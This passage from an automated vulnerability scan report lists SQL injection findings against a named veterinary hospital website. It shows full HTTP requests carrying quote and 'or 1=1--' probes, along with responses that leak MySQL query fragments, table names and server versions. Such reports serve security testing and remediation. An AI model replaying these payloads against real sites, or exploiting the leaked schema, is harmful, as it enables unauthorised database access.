Severity:   High
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /main/img/sema-landing.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /main'/img/sema-landing.jpg HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5mvavkll88lopmn51r8r0kids0

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Mar 2011 12:11:54 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Content-Length: 2238
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='main''                        
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''main''                        
                        limit 1' at line 31

1.7. http://www.vcahospitals.com/main/offer [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 48012625'%20or%201%3d1--%20 was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /main48012625'%20or%201%3d1--%20/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2
525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:19:19 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=ahpca9ejckksr3056ippblins3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2261
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...
ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='main48012625'%20or%201%3d1--%20'                        
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%20'                        
                        limit 1' at line 31

1.8. http://www.vcahospitals.com/main/offer [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /main'/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:05:10 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=hq8rnqfmmvda2haj49mg0si302; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2238
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='main''                        
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''main''                        
                        limit 1' at line 31

Request 2

GET /main''/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:05:11 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=ohksbkggjsps1t5j8gv02nt5p1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
Content-Length: 16281

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...

1.9. http://www.vcahospitals.com/main/offer/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /main'/offer/?&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:34 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2238
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='main''                        
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''main''                        
                        limit 1' at line 31

Request 2

GET /main''/offer/?&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response 2

HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:17:35 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
Content-Length: 16306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...

1.10. http://www.vcahospitals.com/main/offer/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 21204365'%20or%201%3d1--%20 was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /main21204365'%20or%201%3d1--%20/offer/?=3&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:19:33 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=o6doohfgvipr3saul15roodh63; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2261
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...
ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='main21204365'%20or%201%3d1--%20'                        
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%20'                        
                        limit 1' at line 31

1.11. http://www.vcahospitals.com/main/offer/thank-you.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /main/offer/thank-you.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /main'/offer/thank-you.html? HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 429

fname=&lname=&addr=&city=&state=AK&zip=&phone=&email=&optin=on&pettype=&other=&petname=&petage=&variant=&token=917e022cccb7f727295d2ccceeb0579c&guid=2505B0C6-B6AA-4144-878F-54873D353284&referer=&uri=h
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:22:46 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2238
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='main''                        
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''main''                        
                        limit 1' at line 31

1.12. http://www.vcahospitals.com/main/offer/thank-you.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/thank-you.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

POST /main'/offer/thank-you.html? HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 448

fname=&lname=&addr=&city=&state&zip=&phone=&email=&optin=on&pettype&other=&petname=&petage=&variant=&submit=Get+FREE+Coupon&token=917e022cccb7f727295d2ccceeb0579c&guid=2505B0C6-B6AA-4144-878F-54873D35
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:25:07 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2238
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='main''                        
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''main''                        
                        limit 1' at line 31

Request 2

POST /main''/offer/thank-you.html? HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 448

fname=&lname=&addr=&city=&state&zip=&phone=&email=&optin=on&pettype&other=&petname=&petage=&variant=&submit=Get+FREE+Coupon&token=917e022cccb7f727295d2ccceeb0579c&guid=2505B0C6-B6AA-4144-878F-54873D35
...[SNIP]...

Response 2

HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:25:12 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
Content-Length: 8205

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...

1.13. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /manhattan-veterinary-group/appt.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /manhattan-veterinary-group'/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:39 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2282
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...
oin ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='manhattan-veterinary-group''                        
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''manhattan-veterinary-group''                        
                        limit 1' at line 31

Request 2

GET /manhattan-veterinary-group''/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665

Response 2

HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:46:41 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
Content-Length: 20576

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...

1.14. http://www.vcahospitals.com/marshfield [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /marshfield

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /marshfield' HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.15.10.1299326665

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:06 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2250
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='marshfield''                        
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''marshfield''                        
                        limit 1' at line 31

Request 2

GET /marshfield'' HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.15.10.1299326665

Response 2

HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:47:08 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
